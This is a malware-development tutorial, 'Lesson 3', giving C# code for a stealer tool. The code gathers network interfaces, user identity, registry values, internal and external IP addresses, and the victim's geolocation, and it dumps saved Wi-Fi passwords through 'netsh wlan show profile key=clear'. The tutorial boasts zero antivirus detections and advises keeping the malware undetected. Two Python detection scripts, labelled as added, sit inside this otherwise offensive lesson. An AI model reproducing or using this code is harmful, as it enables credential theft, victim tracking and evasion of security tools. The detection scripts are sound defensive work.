Lesson 3: Collecting Network Information for Malware Development
Follow XIT on Medium and UglyCompany on Telegram for more.
Below is the Topics List for Lesson 3:
3. Collecting Network Information:
⇢ Collecting Network and User Profile Information
⇢ Reading System Registry
⇢ Wifi-Network Info
⇢ Internal & External IP Info
⇢ SSID Passwords
⇢ Current Location
As we continue our dive into malware development, this lesson covers the basics of network data collection. By collecting information about a user’s network and IP addresses, you can build more powerful and targeted malware tools. We’ll show you how to collect network and user profile information, read the system registry, and read saved Wi-Fi network information. We will also cover retrieving the internal and external IP addresses, extracting saved SSID (Wi-Fi) passwords, and getting the current location of the target machine.
Topic 1: Gathering User and Network Profile Data
Accessing network and user profile data is the first stage of gathering network information. We’ll show you how to obtain this data with C# code and offer advice on how to store and organize it in your malware tool.
In your ‘Network.cs’ class file, create a new function for each topic covered in this lesson.
A] We will retrieve the network interfaces on the local computer and display their name, description, status, and MAC address, as shown below:
Name: The name of the network interface.
Description: The description of the network interface.
Status: The operational status of the network interface.
MAC Address: The physical MAC address of the network interface.
// network interfaces info
NetworkInterface[] adapters = NetworkInterface.GetAllNetworkInterfaces();
Console.WriteLine("Network Interfaces:");
foreach (NetworkInterface adapter in adapters)
{
    Console.WriteLine($" Name: {adapter.Name}");
    Console.WriteLine($" Description: {adapter.Description}");
    Console.WriteLine($" Status: {adapter.OperationalStatus}");
    Console.WriteLine($" MAC Address: {adapter.GetPhysicalAddress()}");
    Console.WriteLine();
}
B] We will retrieve information about the current Windows user and display its name, authentication type, and whether the user is authenticated, a guest, or a system account, as shown below:
Name: The name of the user profile.
Authentication Type: The type of authentication used to authenticate the user.
Is Authenticated: Whether the user is currently authenticated or not.
Is Guest: Whether the user is a guest user or not.
Is System: Whether the user is a system user or not.
// user profile info
WindowsIdentity identity = WindowsIdentity.GetCurrent();
Console.WriteLine("User Profile Information:");
Console.WriteLine($" Name: {identity.Name}");
Console.WriteLine($" Authentication Type: {identity.AuthenticationType}");
Console.WriteLine($" Is Authenticated: {identity.IsAuthenticated}");
Console.WriteLine($" Is Guest: {identity.IsGuest}");
Console.WriteLine($" Is System: {identity.IsSystem}");
Console.WriteLine();
Once you have wrapped the above code in a function, call it from Main in ‘Program.cs’ and run the application to test it. You should get output like the following:
Network Interfaces:
Name: Ethernet
Description: Realtek PCIe GBE Family Controller
Status: Up
MAC Address: 00-11-22-33-44-55
Name: Wi-Fi
Description: Intel(R) Dual Band Wireless-AC 7260
Status: Up
MAC Address: 66-77-88-99-AA-BB
Name: Bluetooth Network Connection
Description: Bluetooth Device (Personal Area Network)
Status: Down
MAC Address: AA-BB-CC-DD-EE-FF
User Profile Information:
Name: DOMAIN\Username
Authentication Type: NTLM
Is Authenticated: True
Is Guest: False
Is System: False
Topic 2: Reading System Registry
The system registry contains valuable information about the user’s network and system configuration. We’ll show you how to read and access this information with C# code.
A] Our goal for this topic is to open the registry hive for the current user, navigate to the “Software\Microsoft\Windows\CurrentVersion\Run” key, read the “SomeExampleApp” value, and write that value to the console, as shown below:
Remember that “SomeExampleApp” can be any application whose value you want to read.
// read registry key
RegistryKey key = Registry.CurrentUser;
key = key.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run");
string value = (string)key.GetValue("SomeExampleApp");
Console.WriteLine($"SomeExampleApp registry value: {value}");
Reading the system registry can yield the following information:
- Usernames and passwords: some applications store login credentials in the registry.
- System configuration: the registry holds information about installed software, hardware components, and network settings, as discussed in Lesson 2 on hardware.
- User activity: Some applications log user activity in the registry, including browsing history, file access, and application usage. We could use this information to gather intelligence or commit identity theft.
- Encryption keys: some encryption applications store their keys in the registry; access to these keys could help decrypt sensitive data.
Once you have wrapped the above code in a function, call it from Main in ‘Program.cs’ and run the application to test it. You should get output like the following:
Google Chrome registry value: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
Topic 3: Wifi-Network Info
Capturing Wi-Fi network information is a powerful feature of any malware tool. The network interface enumeration in Topic 1 already covers it, since the Wi-Fi adapter is listed among the interfaces.
Topic 4: Internal & External IP Info
Knowing the user’s internal and external IP addresses helps you build more targeted and effective malware tools. We’ll demonstrate how to access this information and give tips on using it.
A] We will retrieve the internal IP address of the local computer using the Dns class. Specifically, we get all IP addresses associated with the local host name and filter the result for the first IPv4 address (an address in the InterNetwork family). If a matching address is found, it is printed to the console, as shown below:
// internal IP address
string internalIp = Dns.GetHostAddresses(Dns.GetHostName())
    .FirstOrDefault(ip => ip.AddressFamily == AddressFamily.InterNetwork)
    ?.ToString();
Console.WriteLine($"Internal IP Address: {internalIp}");
B] We will retrieve the external IP address of the local computer by making an HTTP request to an external API that returns the public IP in one shot. Here I’ll use https://ifconfig.me/ip, but you can use any (I’ll list some below). We then parse the response to extract the IP address. Specifically, we use the WebClient class to make the request and the Regex class to search the response for four groups of digits separated by periods, i.e. an IPv4 address.
If the API used in the code below stops working or returns an error, you can switch to one of the alternate public-IP APIs listed below:
// external IP address
WebClient client = new WebClient();
string externalIpRaw = client.DownloadString("https://ifconfig.me/ip");
string externalIp = Regex.Match(externalIpRaw, @"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}").Value;
Console.WriteLine($"External IP Address: {externalIp}");
Once you have wrapped the above code in a function, call it from Main in ‘Program.cs’ and run the application to test it. You should get output like the following:
Internal IP Address: 192.168.1.100
External IP Address: 69.0.111.5
Topic 5: SSID Passwords
Capturing saved SSID passwords is another powerful feature of any malware tool. We’ll show you how to access this information and log it to the console.
A] We will retrieve the saved Wi-Fi profiles and their passwords using regular expressions and display them in the console. We use the pattern @"All User Profile\s+:\s(.*)\r?\n.*Key Content\s+:\s(.*)\r?", which matches the profile name and password of each saved Wi-Fi network, then iterate over each match with a foreach loop and print the profile name and password to the console, as shown below:
// wifipass
Process process = new Process();
process.StartInfo.FileName = "netsh";
process.StartInfo.Arguments = "wlan show profile key=clear";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();
MatchCollection matches = Regex.Matches(output, @"All User Profile\s+:\s(.*)\r?\n.*Key Content\s+:\s(.*)\r?", RegexOptions.Singleline);
foreach (Match match in matches)
{
    string ssid = match.Groups[1].Value;
    string password = match.Groups[2].Value;
    Console.WriteLine($"SSID: {ssid}, Password: {password}");
}
Once you have wrapped the above code in a function, call it from Main in ‘Program.cs’ and run the application to test it. You should get output like the following:
SSID: HomeNetwork, Password: mypassword1
SSID: WorkNetwork, Password: mypassword2
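From the defender’s side, the approach in this topic leaves a distinct trace in process-creation telemetry: a netsh.exe child process whose command line contains wlan show profile together with key=clear. The following Python is an added detection example, not code from this lesson or from its author. It runs over constructed Sysmon-style process-creation records (the field names Image, CommandLine, ParentImage and User, and every sample value, are assumptions for the example), grades the netsh command line, and flags a parent process that is not an interactive shell:

```python
"""Detect saved-Wi-Fi credential dumping via netsh in process-creation telemetry.

Added detection example. The records below imitate Sysmon Event ID 1 fields
(Image, CommandLine, ParentImage, User); the values are constructed, not captured.
"""
import shlex
from dataclasses import dataclass
from typing import Optional

# Constructed sample telemetry: one record per process start.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh  wlan show profile name="HomeNetwork" key=clear',
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\updater.exe",
     "User": r"DESKTOP-1\alice"},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh wlan show profiles",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"DESKTOP-1\alice"},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh interface ip show config",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"DESKTOP-1\alice"},
    {"Image": r"C:\Windows\System32\ipconfig.exe",
     "CommandLine": "ipconfig /all",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"DESKTOP-1\alice"},
]

# Parents from which an interactive netsh call is expected; anything else
# (an updater in Temp, an Office process, a scripting host) raises the priority.
EXPECTED_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}


@dataclass
class Finding:
    severity: str
    rule: str
    command_line: str
    parent: str
    unusual_parent: bool


def _tokens(command_line: str) -> list:
    """Lower-cased tokens; posix=False keeps name="..." as one token so a
    profile name containing spaces does not break the flag=value matching."""
    try:
        return [t.lower() for t in shlex.split(command_line, posix=False)]
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        return command_line.lower().split()


def analyze_event(event: dict) -> Optional[Finding]:
    """Grade one process-creation record; None when no rule applies."""
    image = event.get("Image", "").lower()
    if image.rsplit("\\", 1)[-1] != "netsh.exe":
        return None
    toks = _tokens(event.get("CommandLine", ""))
    if "wlan" not in toks or "show" not in toks:
        return None
    if not any(t.startswith("profile") for t in toks):  # "profile" or "profiles"
        return None
    parent = event.get("ParentImage", "")
    unusual = parent.lower().rsplit("\\", 1)[-1] not in EXPECTED_PARENTS
    if "key=clear" in toks:
        # Only this form makes netsh print the stored pre-shared key.
        return Finding("high", "wifi_profile_key_dump", event["CommandLine"], parent, unusual)
    return Finding("low", "wifi_profile_enumeration", event["CommandLine"], parent, unusual)


def analyze(events: list) -> list:
    """Return findings in input order, dropping events that match no rule."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        flag = " (unexpected parent)" if f.unusual_parent else ""
        print(f"[{f.severity}] {f.rule}: {f.command_line} <- {f.parent}{flag}")
```

The check is cheap and catches exactly what this lesson’s code spawns, but it only sees a netsh child process; tooling that reads the profiles through the Windows API directly never triggers it, so treat it as one signal to combine with parent-process and user context rather than as a complete control.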
Topic 6: Current Location
In Topic 4 of this lesson we retrieved the external IP address of the target machine. Now we use that address to get information about the user’s current location. We’ll show you how to access this information and log it to the console.
A] We will perform an HTTP GET request to the Geoplugin API with the external IP address retrieved in Topic 4, then parse the response as XML using the XDocument class. We extract the location fields from the XML with LINQ to XML and store them in variables such as city, region and country. Finally, we write the extracted location data to the console with Console.WriteLine, as shown below:
// current location
var httpClient = new HttpClient();
var ip = "THE.EXTERNAL.IP.WHICH.WE.RETRIEVED.FROM.TO";
var url = $"http://www.geoplugin.net/xml.gp?ip={ip}";
var response = httpClient.GetAsync(url).Result;
var xml = response.Content.ReadAsStringAsync().Result;
var doc = XDocument.Parse(xml);
var City = doc.Root.Element("geoplugin_city").Value;
var Region = doc.Root.Element("geoplugin_region").Value;
var Country = doc.Root.Element("geoplugin_countryName").Value;
var Latitude = double.Parse(doc.Root.Element("geoplugin_latitude").Value);
var Longitude = double.Parse(doc.Root.Element("geoplugin_longitude").Value);
Console.WriteLine(City);
Console.WriteLine(Region);
Console.WriteLine(Country);
Console.WriteLine(Latitude);
Console.WriteLine(Longitude);
Once you have wrapped the above code in a function, call it from Main in ‘Program.cs’ and run the application to test it. You should get output like the following:
Mountain View
California
United States
37.386
-122.0838
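The external-IP lookup in Topic 4 and the geolocation call in this topic are both plain outbound HTTP requests, so a web proxy or DNS log records them. The following Python is an added detection example, not part of this lesson or its author’s code. It parses constructed proxy log lines (the key=value line format, the source addresses and the timestamps are assumptions for the example) and raises the severity when the same internal host queries a public-IP service and then an IP-geolocation service within a short window, which is the exact sequence this lesson builds. The service lists extend the lesson’s two hosts (ifconfig.me and geoplugin.net) with a few other well-known equivalents:

```python
"""Correlate public-IP lookups with IP-geolocation queries per source host.

Added detection example. The log lines are constructed in a simple key=value
format (timestamp, src, host, path); they are not captures from a real proxy.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Services that answer with the caller's public address. ifconfig.me is the one
# used in this lesson; the others are well-known equivalents.
PUBLIC_IP_SERVICES = {"ifconfig.me", "api.ipify.org", "icanhazip.com", "checkip.amazonaws.com"}
# IP-geolocation services. geoplugin.net is the one used in this lesson.
GEOLOCATION_SERVICES = {"www.geoplugin.net", "geoplugin.net", "ip-api.com", "ipinfo.io"}

# Constructed sample log: 10.0.0.5 performs the lesson's two-step chain within a
# second, 10.0.0.9 performs both steps but 85 minutes apart, 10.0.0.12 is benign.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z src=10.0.0.5 host=ifconfig.me path=/ip
2024-05-01T10:00:02Z src=10.0.0.5 host=www.geoplugin.net path=/xml.gp?ip=203.0.113.7
2024-05-01T10:05:00Z src=10.0.0.9 host=api.ipify.org path=/
2024-05-01T11:30:00Z src=10.0.0.9 host=www.geoplugin.net path=/xml.gp?ip=203.0.113.7
2024-05-01T10:07:00Z src=10.0.0.12 host=example.com path=/index.html
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) host=(?P<host>\S+) path=(?P<path>\S*)$")


def parse(log_text: str) -> list:
    """Return (timestamp, src, host, path) tuples sorted by time; malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # do not let one bad line fail the whole batch
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["src"], m["host"].lower(), m["path"]))
    return sorted(events)


def correlate(events: list, window: timedelta = timedelta(minutes=10)) -> dict:
    """Map each source host to a severity.

    high   - public-IP lookup followed by a geolocation query within `window`
    medium - geolocation query without a nearby public-IP lookup
    low    - public-IP lookup alone (common for some legitimate software)
    """
    by_src = defaultdict(list)
    for ts, src, host, _path in events:
        by_src[src].append((ts, host))
    verdicts = {}
    for src, seq in by_src.items():
        ip_lookups = [ts for ts, h in seq if h in PUBLIC_IP_SERVICES]
        geo_queries = [ts for ts, h in seq if h in GEOLOCATION_SERVICES]
        if ip_lookups and geo_queries:
            chained = any(timedelta(0) <= (g - i) <= window
                          for i in ip_lookups for g in geo_queries)
            verdicts[src] = "high" if chained else "medium"
        elif geo_queries:
            verdicts[src] = "medium"
        elif ip_lookups:
            verdicts[src] = "low"
    return verdicts


def analyze(log_text: str = SAMPLE_LOG) -> dict:
    return correlate(parse(log_text))


if __name__ == "__main__":
    for src, severity in sorted(analyze().items()):
        print(f"{src}: {severity}")
```

Because the lesson’s geolocation request is sent over plain http and carries the just-discovered public address in the query string, a proxy sees the full URL; on a TLS-only network you would apply the same correlation to DNS query logs, keeping only the host field.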
Finally, I compiled all the topics of Lesson 3, and it was detected by 0 out of 26 antivirus engines. Below is the scan report from antiscan.me:
Remember: don’t share your unencrypted assemblies or malware source with random antivirus scanners; use only those listed in the article given below to keep your malware undetected forever:
Conclusion
Collecting network information is a crucial part of creating effective malware tools. In this lesson, we covered the basics of collecting network and user profile information, reading system registry data, gathering Wi-Fi network information, and accessing internal and external IP addresses. We also covered how to capture saved SSID passwords for added potency. With this knowledge, you’re well on your way to creating more potent and effective malware tools. Stay tuned for our next lesson, where we’ll explore working with Filtration!